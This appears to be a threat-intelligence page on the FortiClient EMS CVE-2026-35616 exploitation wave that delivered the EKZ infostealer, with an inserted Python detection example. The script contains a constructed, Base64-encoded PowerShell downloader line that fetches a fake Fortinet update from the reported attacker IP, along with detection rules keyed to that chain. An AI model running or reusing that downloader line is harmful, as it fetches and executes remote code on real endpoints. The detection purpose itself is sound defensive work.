
FortiClient EMS CVE-2026-35616 exploitation wave

Exploitation Wave
Happening score: 56
2 unique sources, 2 articles

Summary


Exploitation of CVE-2026-35616 in FortiClient Enterprise Management Server (EMS) is being used to deliver EKZ, a previously undocumented credential stealer. Attackers abuse unauthenticated API access and FortiClient-managed VPN scripting workflows to disguise the payload as a Fortinet endpoint update, launch malicious scripts through fortitray.exe and cmd.exe, and exfiltrate the stolen data to an attacker-controlled VPS over plain HTTP. Fortinet released emergency hotfixes for EMS 7.4.5 and 7.4.6, CISA ordered federal civilian agencies to secure affected instances, and The Shadowserver Foundation reported 2,000 internet-exposed EMS instances.

Cases

Related Happenings

EKZ Infostealer delivered through FortiClient EMS abuse

Malware Activity
First: 28.05.2026 20:25 Last: 28.05.2026 20:25 Sources 1

How related: The downloaded payload, tracked as EKZ Infostealer, features fairly standard information-stealing functionality.

About this happening: A new **EKZ Infostealer** delivery chain is using **FortiClient EMS** abuse to silently install a credential stealer and siphon browser data from affected endpoints. The malware i...

Apex One on-premises server directory traversal zero-day (CVE-2026-34926)

Vulnerability
First: 22.05.2026 16:39 Last: 22.05.2026 16:39 Sources 1

About this happening: **CVE-2026-34926** is a **Trend Micro Apex One** **on-premises** directory traversal zero-day that can let a privileged local attacker inject malicious code onto affected **agents...

Fortinet security patch release for CVE-2026-44277

Security Patch Release
First: 12.05.2026 21:23 Last: 12.05.2026 21:23 Sources 1

About this happening: Fortinet released **security updates** for **FortiSandbox** and **FortiAuthenticator** to fix **two critical vulnerabilities** that could let an **unauthenticated attacker** execu...

Fortinet FortiClient EMS emergency patch release (CVE-2026-35616, CVE-2026-21643)

Security Patch Release
First: 07.04.2026 12:26 Last: 07.04.2026 12:26 Sources 1

How related: The issue was addressed by Fortinet in FortiClient EMS 7.4.7 and later.

About this happening: **Fortinet FortiClient EMS** is a **security-patch release** happening centered on **CVE-2026-35616** and **CVE-2026-21643**. Fortinet issued an **out-of-band emergency hotfix** a...

Latest development: 28.05.2026 18:26

Arctic Wolf observed threat actors abusing FortiClient Enterprise Management Server (EMS) through CVE-2026-35616 in May 2026 to modify EMS-managed configuration, disguise FortiEndpoint_Patch.exe as a Fortinet endpoint update, and use fortitray.exe, cmd.exe, and a Base64-encoded PowerShell chain to download malware and exfiltrate browser data to 83.138.53[.]110.
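The chain above (FortiTray.exe spawning cmd.exe, an encoded PowerShell command, a fake "FortiEndpoint_Patch.exe" name, and plain-HTTP traffic to the listed VPS) maps onto a handful of process-creation and network-connection checks. The following is an added detection example, not code from the page's sources, Arctic Wolf, or Fortinet. It runs over a constructed, Sysmon-shaped event list (the field names, PIDs, paths, and the encoded command are assumptions built for this illustration; only the exfiltration IP comes from the write-up) and decodes `-EncodedCommand` arguments the way PowerShell does, as Base64 over UTF-16LE, so the decoded script can be matched too.

```python
import base64
import re
from dataclasses import dataclass

# Indicator taken from the write-up above; extend from your own intel feed.
KNOWN_EXFIL_HOSTS = {"83.138.53.110"}

# Constructed sample: a plausible downloader one-liner, encoded the way
# PowerShell expects for -EncodedCommand (Base64 of UTF-16LE). Not a real sample.
PLAIN = "IEX (New-Object Net.WebClient).DownloadString('http://83.138.53.110/FortiEndpoint_Patch.exe')"
ENC = base64.b64encode(PLAIN.encode("utf-16-le")).decode("ascii")

# Constructed events in the shape of Sysmon EID 1 (process) and EID 3 (network).
# Hypothetical PIDs and paths; the last event is benign FortiClient behaviour.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4100, "ppid": 900,
     "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -NoP -W Hidden -EncodedCommand " + ENC},
    {"type": "process", "pid": 4120, "ppid": 4100,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENC},
    {"type": "network", "pid": 4120, "dest_ip": "83.138.53.110", "dest_port": 80},
    {"type": "process", "pid": 5000, "ppid": 900,
     "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe",
     "cmdline": "FortiClient.exe"},
]

ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(events):
    """Flag the FortiTray -> cmd -> encoded PowerShell -> HTTP exfil chain."""
    alerts = []
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    for e in events:
        if e["type"] == "process":
            parent, image = e["parent_image"].lower(), e["image"].lower()
            # FortiTray launching a shell is not part of normal client behaviour.
            if parent.endswith("\\fortitray.exe") and image.endswith("\\cmd.exe"):
                alerts.append(Alert("fortitray_spawns_cmd", e["pid"], e["cmdline"]))
            decoded = decode_encoded_command(e["cmdline"])
            if decoded is not None and image.endswith("\\powershell.exe"):
                alerts.append(Alert("encoded_powershell", e["pid"], decoded))
            # Match the lure filename in both the raw and the decoded command line.
            haystack = (e["cmdline"] + " " + (decoded or "")).lower()
            if "fortiendpoint_patch.exe" in haystack:
                alerts.append(Alert("fake_fortinet_update_name", e["pid"], e["image"]))
        elif e["type"] == "network":
            if e["dest_ip"] in KNOWN_EXFIL_HOSTS:
                alerts.append(Alert("known_exfil_host", e["pid"], e["dest_ip"]))
            proc = procs.get(e["pid"])
            # PowerShell talking cleartext HTTP is worth a look even without an IOC hit.
            if proc and e["dest_port"] == 80 and proc["image"].lower().endswith("\\powershell.exe"):
                alerts.append(Alert("powershell_plain_http", e["pid"],
                                    f'{e["dest_ip"]}:{e["dest_port"]}'))
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

The benign FortiTray.exe -> FortiClient.exe event produces no alert, which is the point of keying on the child image rather than on FortiTray alone; in production, feed real Sysmon or EDR telemetry into `scan_events` and widen `KNOWN_EXFIL_HOSTS` from your indicator store.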

CISA KEV listing and FCEB patch order for CVE-2026-35616

Public Sector Action
First: 06.04.2026 19:02 Last: 06.04.2026 19:02 Sources 1

About this happening: **CISA** added **CVE-2026-35616** to the **KEV Catalog** and ordered **FCEB agencies** to patch **FortiClient EMS** by **Thursday midnight, April 9**. The mandate matters because...

Timeline

  1. 28.05.2026 18:26 3 articles

    Initial report: FortiClient EMS CVE-2026-35616 exploitation wave

    Initial Disclosure

    By **May 2026**, attackers were exploiting a **FortiClient EMS** flaw for which a fix was already available, pushing malicious scripts through the product's management path. The early phase centered on abusing EMS controls to reach every managed endpoint from a privileged context.
